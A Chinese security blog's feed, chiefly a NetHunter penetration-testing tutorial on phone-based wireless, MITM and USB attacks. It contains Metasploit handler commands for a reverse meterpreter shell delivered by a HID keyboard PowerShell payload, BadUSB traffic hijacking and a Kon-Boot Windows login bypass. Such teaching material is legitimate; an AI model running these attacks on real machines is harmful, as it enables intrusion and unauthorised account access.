Sword Soul c23a464ac17868ff49291eb1b231327c942dc27f-le4f.net 2015-12-31T08:30:00Z 2016 新年快乐 - Happy New Year 2015-12-31T08:30:00Z essay/happy-new-year Sword Soul <p class="md_block"> <span class="md_line">想想这一年过去的也是蛮快,年初说要填坑,至今也没更新。</span> </p> <p class="md_block"> <span class="md_line">年底了,敲点字表示下。</span> </p> <p class="md_block"> <span class="md_line">祝各位关注过博客的朋友,2016 快乐,顺心 :)</span> </p> 关于博客随便写一点 - Things About My Blog 2015-01-20T16:00:00Z essay/things-about-blog Sword Soul <h4 id="toc_0">样式</h4> <p class="md_block"> <span class="md_line">自从11年量产了第一个的<code>冷夜&#39;s Blog</code>后,对博客这种自家一亩三分地就不断的耕耘着.随着认知,想法变化,博客样式也变来变去.后来zing带我看到这个团队的简洁博客:<a class="md_compiled" href="http://shell-storm.org/">http://shell-storm.org/</a></span> </p> <p class="md_block"> <span class="md_line">就在去年以此样式作为蓝图,在比较喜欢的FarBox上完成了又一个二次模板开发之作.</span> </p> <p class="md_block"> <span class="md_line">比较符合自己的需求与审美:)</span> </p> <h4 id="toc_1">名字</h4> <p class="md_block"> <span class="md_line">过去博客以自己惯有ID(冷夜)为名,去年重新整理了博客,思前想后取作Sword Soul,意为<code>剑魄(琴心)</code>.免不了中二的味道,不过是有来源的lol~</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/swordsoul.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">具体含义,给心里留个答案就好了.</span> </p> <h4 id="toc_2">文章</h4> <p class="md_block"> <span class="md_line">有了模板样式,一年的时间也先后把过去的文章补了上来,算作一种积累.今后有新的研究分享也会继续更新.</span> </p> <p class="md_block"> <span class="md_line">右上角的KnownWiki链接则记录下平时一些小Trick.可能更新并不及时.</span> </p> <h4 id="toc_3">读者</h4> <p class="md_block"> <span class="md_line">期望文章能对读者有所帮助,有关注的读者可通过<a class="md_compiled" href="/feed">RSS</a>订阅内容.</span> </p> <h4 id="toc_4">未来</h4> <p class="md_block"> <span class="md_line">未来再看看这篇文章修正吧;)</span> </p> Pocket Hacking: NetHunter实战指南 - NetHunter Field Guide 2015-01-19T16:00:00Z post/pocket-hacking-nethunter-field-guide Sword Soul <p class="md_block"> <span class="md_line">文章已发表至<a class="md_compiled" href="http://drops.wooyun.org/tips/4634">乌云Drops</a>,未授权请勿转载</span> </p> <h4 id="toc_0">0x00 前言</h4> <p class="md_block"> <span class="md_line">许多朋友都希望Hacking套件可以很方便的从PC移植到更便携的手机或平板电脑上,而Offensive Security团队发布的Kali NetHunter则将这一期待变为现实,通过移动终端随时随地进行Hacking,暂且美其名曰口袋Hacking.</span> </p> <p class="md_block"> <span class="md_line">Kali NetHunter是以Nexus(手机/平板)为基本硬件设备(新增对1+手机的支持),基于原生Android实现的便携渗透测试平台.熟悉的Kali使其易于上手,而图形化控制界面则使某些测试更易.基于此平台,工程师们也可自由发挥,加入个人项目.</span> </p> <p class="md_block"> <span class="md_line">关于NetHunter国内外文章相对较少且重复度高,故在此将其主要实战技巧加以整理介绍,以备各位爱好者参考.由于资料不足,难免出错之处,如有疏漏错误,望不吝赐教.</span> </p> <h4 id="toc_1">0x01 硬件支持</h4> <p class="md_block"> <span class="md_line">NetHunter官网给出以下支持刷入NetHunter的手机:</span> </p> <pre><code>Nexus 4 (GSM) - “mako” Nexus 5 (GSM/LTE) - “hammerhead” Nexus 7 [2012] (Wi-Fi) - “nakasi” Nexus 7 [2012] (Mobile) - “nakasig” Nexus 7 [2013] (Wi-Fi) - “razor” Nexus 7 [2013] (Mobile) - “razorg” Nexus 10 (Tablet) - “mantaray” OnePlus One 16 GB - “bacon” OnePlus One 64 GB - “bacon”</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">值得一提的是,2015年NetHunter更新,由于1+手机的廉价与高性能,其被加入支持列表.用1+手机的朋友有福了,以下刷机以Nexus5为例.</span> </p> <h4 id="toc_2">0x02 刷机流程</h4> <p class="md_block"> <span class="md_line">官网给出几种刷机方式,推荐使用Windows引导刷机程序安装.下载地址:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><a class="md_compiled" href="https://www.kali.org/offsec-nethunter-installer/Kali_v1.1.6.sfx.exe">https://www.kali.org/offsec-nethunter-installer/Kali_v1.1.6.sfx.exe</a></span> </p> <p class="md_block"> <span class="md_line">打开安装引导程序,默认路径安装</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-01.png" alt="img" title="" ></span> </p> <p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line">安装后自动运行NetHunter Installer并更新,进入引导安装步骤</span> </p> <ul> <li class="md_li"> Step1,选择已有硬件设备型号. </li> </ul> <p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-02.png" alt="img" title="" ></span> </p> <ul> <li class="md_li"> Step2,安装驱动 </li> </ul> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-03.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-04.png" alt="img" title="" ></span> </p> <p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line">可以通过Test Drivers测试是否安装成功</span> </p> <ul> <li class="md_li"> Step3,安装选项 </li> </ul> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-05.png" alt="img" title="" ></span> </p> <p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line">如已经通过官网下载过刷机包,通过Browser选择文件.下载链接<br /></span> <span class="md_line md_line_dom_embed"><a class="md_compiled" href="http://www.offensive-security.com/kali-linux-nethunter-download/">http://www.offensive-security.com/kali-linux-nethunter-download/</a><br /></span> <span class="md_line">下载后记得校验SHA1值.至于Android Flash Setting,因为对Android L的支持还未完成,故尚未开放选择.</span> </p> <ul> <li class="md_li"> Step4,下载文件 </li> </ul> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-06.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">如图示,下载所有依赖文件.</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-07.png" alt="img" title="" ></span> </p> <p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line">所有依赖包都为Ready可进入下一步刷机.</span> </p> <ul> <li class="md_li"> Step5,解锁设备 </li> </ul> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-08.png" alt="img" title="" ></span> </p> <p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line">解锁bootloader,注意需设置允许USB调试,手机会重启解锁.</span> </p> <ul> <li class="md_li"> Step6,重置原Android </li> </ul> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-09.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">同样再手机上勾选允许USB调试,注意数据会清空,记得备份.</span> </p> <p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-10.png" alt="img" title="" ></span> </p> <ul> <li class="md_li"> Step7,刷入NetHunter </li> </ul> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-11.png" alt="img" title="" ></span> </p> <p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line">经过上一步重置手机后,需重新开启开发者模式,此时可刷入Kali Linux镜像并对手机进行Root,所需时间相对较长.(注:如镜像推送不成功,可以手工将kali_linux_nethunter_1.10_hammerhead_kitkat.zip复制到/sdcard/download/目录进行INSTALL)</span> </p> <ul> <li class="md_li"> Final,安装成功 </li> </ul> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-12.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-13.png" alt="img" title="" ></span> </p> <h4 id="toc_3">0x03 推荐APP一览</h4> <p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line">完成系统刷入后,要丰富NetHunter原装工具,可以下载部分安卓APP以配合.以下为个人推荐</span> </p> <ul> <li class="md_li"> <p class="md_block"> <span class="md_line"> 中文输入法:作为一个汉语狗还是必备的</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> 文件管理器(如RootExplorer):Kali某些文件需要通过支持Root权限的文件管理器.</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> ShadowSocks:梯子还是要有的</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><a class="md_compiled" href="https://github.com/shadowsocks/shadowsocks-android/releases/download/v2.6.2/shadowsocks-nightly-2.6.2.apk">https://github.com/shadowsocks/shadowsocks-android/releases/download/v2.6.2/shadowsocks-nightly-2.6.2.apk</a></span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> MiTM工具:</span> </p> <pre><code>zANTI2:虽为商业化限制部分功能,但使用体验的确好些. dSploit:曾经很出名 lanmitm:国内安全工作者编写发布的工具 Intercepter-NG:嗅探工具 Network Spoofer:自带许多调戏功能</code></pre> <!--block_code_end--></li> <li class="md_li"> <p class="md_block"> <span class="md_line"> IPTools:部分常见基本网络工具集合</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-14.png" alt="img" title="" ></span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> ChangeHostname:修改当前手机主机名HostName(还是有必要的).</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> WiGLE wifi:War Driving工具,收集无线热点信息,可保存到本地数据库.</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> SQLiteEditor:方便读取数据库信息</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> Hacker&#39;s KeyBoard:NetHunter自带,便于输入各种控制字符</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> 远程桌面:NetHunter自带,便于连接VNC服务.</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> DriveDroid:NetHunter自带,将手机内镜像模拟为启动盘.</span> </p> </li> </ul> <h4 id="toc_4">0x04 目录与服务</h4> <p class="md_block"> <span class="md_line">安装好NetHunter,先要对其目录与服务研究一番.Kali NetHunter根目录对应安卓系统目录的/data/local/kali-armhf目录</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-15.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">NetHunter自带工具,也多在此目录内.故如有抓包/日志等文件,找不到存放地址,不妨到此目录下寻觅一番(注:需Root权限).另外,NetHunter某些工具运行时的提示的目录,也多以此处为根目录.</span> </p> <p class="md_block"> <span class="md_line">通常,截获的数据包等文件存放在NetHunter目录下的Captures目录:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-16.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">与Kali Linux类似,/usr/share下存放了大部分工具,并建立link,命令行可直接调用.</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-17.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">而Metasploit则依然位于/opt/目录下.</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-18.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">上图中/opt/dic目录则存放有字典文件,可自行补充.</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-19.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">此为/var/www目录,想来大家也知道是何用处了:)</span> </p> <p class="md_block"> <span class="md_line">至于服务,Offensive Security团队在新版中加入NetHunter Home以APP的形式管理服务开关,避免了之前版本通过WebServer管理的弊端(比如Web页面调用Google Fonts被墙卡半天 ;)</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-20.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">如图示,NetHunter Home为主页面,除了Offensive Security的Banner,还可以获取当前IP(内网/外网)地址.</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-21.png" alt="img" title="" ></span> </p> <p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line">Kali Launcher整合了四个启动器:</span> </p> <ul> <li class="md_li"> 终端打开一个Kali Shell </li> <li class="md_li"> 终端打开Kali NetHunter Menu </li> <li class="md_li"> 终端打开Wifite进入无线破解 </li> <li class="md_li"> 更新Kali NetHunter(执行sudo -c bootkali update) </li> </ul> <p class="md_block"> <span class="md_line">对于NetHunter服务开关控制,则在Kali Service Control面板里进行设置</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-22.png" alt="img" title="" ></span> </p> <p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line">可看到,NetHunter可开放服务有SSH,Dnsmasq,Hostapd,OpenVPN,Apache,Metasploit及BeEF FrameWork等.</span> </p> <ul> <li class="md_li"> SSH服务:Secure Shell,方便其他设备连接控制. </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> Dnsmasq服务:DNS解析服务.</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> Hostapd服务:提供无线接入点服务.</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> OpenVPN服务:开放OpenVPN连入服务.</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> Apache服务:WEB服务.</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> Metasploit服务:为MSF攻击模块提供保障.</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> BeEF FrameWork服务:XSS利用框架服务.</span> </p> </li> </ul> <p class="md_block"> <span class="md_line">在此面板可对对应服务进行开关设置.</span> </p> <h4 id="toc_5">0x05 Kali NetHunter Menu</h4> <p class="md_block"> <span class="md_line">在NetHunter Launcher中Kali Menu的启动项,其包含整理有NetHunter常用工具,如图:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-25.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">与上一个版本相比,新增了以下选项:</span> </p> <pre><code>USB Attacks NFC Attacks Monitor Mode Eject USB Wifi</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">主要模块及介绍如下:</span> </p> <p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line md_line_dom_embed"><strong>Wireless Attacks</strong></span> </p> <ul> <li class="md_li"> <p class="md_block"> <span class="md_line"> Wifite</span> </p> <p class="md_block"> <span class="md_line">自动无线安全审计工具</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> Kismet</span> </p> <p class="md_block"> <span class="md_line">无线WarDriving工具</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> AP F**ker</span> </p> <p class="md_block"> <span class="md_line">无线网恶意攻击工具(多为拒绝服务)</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> Wash</span> </p> <p class="md_block"> <span class="md_line">扫描开启WPS的无线网络</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> Airodump-ng</span> </p> <p class="md_block"> <span class="md_line">基本无线攻击套件(必备)</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> Pingen</span> </p> <p class="md_block"> <span class="md_line">针对某些开启WPS的D-link的路由器计算其PIN码以破解</span> </p> </li> </ul> <p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line md_line_dom_embed"><strong>Sniffing/Spoofing</strong></span> </p> <ul> <li class="md_li"> <p class="md_block"> <span class="md_line"> tcpdump</span> </p> <p class="md_block"> <span class="md_line">基本流量Dump工具</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> tshark</span> </p> <p class="md_block"> <span class="md_line">WireShark的Cli工具,可抓取分析流量</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> urlsnarf</span> </p> <p class="md_block"> <span class="md_line">Dsniff工具包一部分,可嗅探HTTP请求包内容,并以CLF通用日志格式输出</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> dsniff</span> </p> <p class="md_block"> <span class="md_line">强大的知名口令嗅探工具包</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> MITMproxy</span> </p> <p class="md_block"> <span class="md_line">中间代理,可截获修改HTTP流量,参考官网介绍</span> </p> </li> </ul> <p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line md_line_dom_embed"><strong>Reverse Shells</strong></span> </p> <ul> <li class="md_li"> <p class="md_block"> <span class="md_line"> AutoSSH</span> </p> <p class="md_block"> <span class="md_line">通过SSH反弹shell(NAT Bypass)</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> pTunnel</span> </p> <p class="md_block"> <span class="md_line">通过ICMP数据包隧道传送数据</span> </p> </li> </ul> <p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line md_line_dom_embed"><strong>Info Gathering</strong></span> </p> <ul> <li class="md_li"> <p class="md_block"> <span class="md_line"> Spiderfoot</span> </p> <p class="md_block"> <span class="md_line">开源扫描与信息收集工具,对给定域名收集子域,Email地址,web服务器版本等信息,自动化扫描.</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> Recon-ng</span> </p> <p class="md_block"> <span class="md_line">强大的信息收集工具,模块化,可惜许多插件国内不适用(有墙).</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> Device-pharmer</span> </p> <p class="md_block"> <span class="md_line">通过Shodan搜索,大数据Hacking.</span> </p> </li> </ul> <p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line md_line_dom_embed"><strong>Vulnerability Scan</strong></span> </p> <ul> <li class="md_li"> <p class="md_block"> <span class="md_line"> OpenVas</span> </p> <p class="md_block"> <span class="md_line">漏洞扫描器,需额外安装.Kali一直默认包含,好不好用客官自行定夺. :)</span> </p> </li> </ul> <p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line md_line_dom_embed"><strong>Exploit Tools</strong></span> </p> <ul> <li class="md_li"> <p class="md_block"> <span class="md_line"> Metasploit</span> </p> <p class="md_block"> <span class="md_line">强大,核心,必备</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> BeEF-XSS</span> </p> <p class="md_block"> <span class="md_line">XSS渗透测试工具,看个人习惯使用</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> Social-Engineering-Toolkit</span> </p> <p class="md_block"> <span class="md_line">Kali下的SET,社会工程学套件,功能强大.</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> MITMf</span> </p> <p class="md_block"> <span class="md_line">中间人攻击框架,基于Python,拥有多个插件,渗透测试功能强大</span> </p> </li> </ul> <p class="md_block"> <span class="md_line md_line_dom_embed"><strong>OpenVPN Setup</strong></span> </p> <p class="md_block"> <span class="md_line">OpenVPN设置</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><strong>VNC Setup</strong></span> </p> <p class="md_block"> <span class="md_line">VNC设置</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><strong>Log/Capture Menu</strong></span> </p> <p class="md_block"> <span class="md_line">可擦除本地所有抓取数据或同步到SD卡上(同步主要是解决权限问题.比如多数安卓APP未获得root权限是无法读取NetHunter工具截获的数据内容)</span> </p> <p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line md_line_dom_embed"><strong>USB Attacks</strong></span> </p> <ul> <li class="md_li"> <p class="md_block"> <span class="md_line"> Dictionary based brute force attack</span> </p> <p class="md_block"> <span class="md_line">自动输入字典一行内容并回车,基于HID,模拟操作方式的暴力破解</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> deADBolt</span> </p> <p class="md_block"> <span class="md_line">执行一堆ADB命令可以推送隐私文件等信息到指定目录,参考项目主页<br /></span> <span class="md_line">https://github.com/photonicgeek/deADBolt</span> </p> </li> </ul> <p class="md_block"> <span class="md_line md_line_dom_embed"><strong>NFC Attack</strong></span> </p> <p class="md_block"> <span class="md_line">提供了复制、重写、查看M卡数据功能(是不是不必带上Acr122u了;)</span> </p> <p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line md_line_dom_embed"><strong>Settings</strong></span> </p> <ul> <li class="md_li"> <p class="md_block"> <span class="md_line"> 修改时区</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> 为Metasploit创建用户和数据库</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> 修改MAC地址</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> 安装NodeJS</span> </p> </li> </ul> <p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line md_line_dom_embed"><strong>Service</strong></span> </p> <ul> <li class="md_li"> <p class="md_block"> <span class="md_line"> SSH服务开关</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> VNC服务开关</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> OpenVPN服务开关</span> </p> </li> <li class="md_li"> <p class="md_block"> <span class="md_line"> 在本地启动Xserver</span> </p> </li> </ul> <p class="md_block"> <span class="md_line md_line_dom_embed"><strong>Monitor Mode</strong></span> </p> <p class="md_block"> <span class="md_line">启动或关闭wlan1(外置无线网卡)的混杂监听模式</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><strong>Eject USB Wifi</strong></span> </p> <p class="md_block"> <span class="md_line">弹出USB无线网卡</span> </p> <h4 id="toc_6">0x06 HID KeyBoard Attack</h4> <p class="md_block"> <span class="md_line">在过去,USB自启往往依赖插入的USB设备中的autorun.inf实现.时下这招往往不灵,而新兴的USB HID Attack则成为新的安全威胁.USB HID可通过模拟键盘或鼠标操作,实时执行目标代码,在此以PowerSploit结合MSF为例:</span> </p> <p class="md_block"> <span class="md_line">首先运行提供payload的webserver,在Kali Service Control中开启Apache服务器</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-30.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">转到HID攻击配置页面,选择PowerSploit</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-31.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">IP和端口填写MSF监听的IP端口,Payload我们选择windows/meterpreter/reverse_https,URL为提供Apache服务的IP,这里即本机:192.168.1.151</span> </p> <p class="md_block"> <span class="md_line">配置好后UPDATE配置文件,接下来需配置MSF监听反弹shell</span> </p> <pre><code>root@kali:~# msfconsole -q msf &gt; use exploit/multi/handler msf exploit(handler) &gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">payload同HID配置页面中的payload</span> </p> <pre><code>msf exploit(handler) &gt; set PAYLOAD windows/meterpreter/reverse_https PAYLOAD =&gt; windows/meterpreter/reverse_https</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">IP和端口同样设置</span> </p> <pre><code>msf exploit(handler) &gt; msf exploit(handler) &gt; set LHOST 192.168.0.17 LHOST =&gt; 192.168.0.17 msf exploit(handler) &gt; set LPORT 4444 LPORT =&gt; 443 msf exploit(handler) &gt; exploit [*] Started HTTPS reverse handler on https://0.0.0.0:4444/ [*] Starting the payload handler...</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">至此配置OK</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-32.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">开始监听</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-33.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">此时将设备连接至PC机,等待设备被识别后,执行Execute,攻击开始.</span> </p> <p class="md_block"> <span class="md_line">POWERSHELL命令执行后,就可在msf中看到反弹的shell了:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-34.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">如连上PC后没有反应,可按Reset USB键更新.</span> </p> <p class="md_block"> <span class="md_line">当然,HID KeyBoard Attack也提供了Windows CMD攻击模块,即连入计算机后自动打开CMD并执行指定命令(默认为添加新管理员用户,可自由定制).</span> </p> <h4 id="toc_7">0x07 BadUSB MITM Attack</h4> <p class="md_block"> <span class="md_line">BadUSB Attack是BlackHat大会上公布的一种较先进的USB攻击方式,模拟键盘操作等Payload可自动执行某些操作,而NetHunter的BadUSB MiTM Attack则是其中一种玩法:修改网络设定,劫持网络流量.</span> </p> <p class="md_block"> <span class="md_line">关于BadUSB MITM Attack,NetHunter官网有演示视频,详见<a class="md_compiled" href="http://www.nethunter.com/showcase/">http://www.nethunter.com/showcase/</a>,但并未交代详细过程,以下笔者操作为例:</span> </p> <p class="md_block"> <span class="md_line">首先,确保手机连接目标计算机时,MTP文件传输是关闭的.连接目标计算机,打开手机USB网络共享:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-40.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">此时在NetHunter Home打开一个Kali Shell,查看网卡多出虚拟网卡rndis0(USB网络共享网卡).</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-41.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">此时可以开启Tcpdump截获流量,命令如:</span> </p> <pre><code>tcpdump -i rndis0</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">回到NetHunter Home,切换到BadUSB MiTM Attack,勾选右上角选项Start BadUSB Attack</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-42.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">被连接的计算机此时会多出一个网卡,网关为rndis0的IP地址</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-43.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">此时流量已可以截获,例如访问某些网站,手机tcpdump处流量显示如图:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-44.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">因为手机并未插入SIM卡,无网络,故PC机并无法得到返回页面.</span> </p> <p class="md_block md_has_block_below md_has_block_below_blockquote"> <span class="md_line">之前有同学在Drops分享的一片文章<a class="md_compiled" href="http://drops.wooyun.org/tools/3113">Kali Nethunter初体验</a>中提到:</span> </p> <blockquote> <p class="md_block"> <span class="md_line"> 出现双网关现在所以并未像官网演示的那样流量直接走向恶意网关(10.0.0.1)而是依旧走的之前的网关(192.168.1.1)故劫持失败</span> </p> </blockquote> <p class="md_block"> <span class="md_line">这种情况也可能出现,不过个人测试中,网络连接优先级,默认劫持后的网关优先级更高,故流量可以正常劫持.也可能是NetHunter今年更新后做的优化,如图示:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-45.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">当然,配合HID Keyboard Attack进行攻击测试也是很好的方式,至于数据包的保存与分析,则可自行发挥.</span> </p> <h4 id="toc_8">0x08 绕过Windows登录认证</h4> <p class="md_block"> <span class="md_line">NetHunter其实有许多隐藏玩法,比如借助DriveDroid实现Windows登陆绕过密码.</span> </p> <p class="md_block"> <span class="md_line">DriveDroid本是个允许通过安卓手机中的ISO/IMG镜像文件引导启动PC机的一个App,但结合了特定的镜像,实现绕过Windows登陆认证就变得可行:)</span> </p> <p class="md_block"> <span class="md_line">在此以Win7为例,首先为默认账户创建密码hello.</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-50.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">DriveDroid默认引导镜像存放目录位于SDCard/Download/images,只需将欲引导的镜像存放于此目录即可.</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-51.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">这里绕过Windows或OSX登陆认证的镜像为Kon-Boot.可以到官网了解,其原理在于处理BIOS修改系统内核的引导处理,跳过SAM检查,直接登陆系统.因为是付费软件,以下以自行寻觅的镜像为例演示.</span> </p> <p class="md_block"> <span class="md_line">关闭MTP文件传输,打开DriveDroid,自动列出images目录下得镜像文件.</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-52.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">选择Kon-Boot.img镜像挂载,模式这里选择为Read-Only USB</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-53.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">加载成功后相应镜像有所标志</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-54.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">而在连入的PC机中也会显示加载有新的可移动磁盘(或软驱盘),如未能显示,可在配置页面进行相应调整(可通过USB Setup Wizard向导指引)</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-55.png" alt="img" title="" ></span> </p> <p 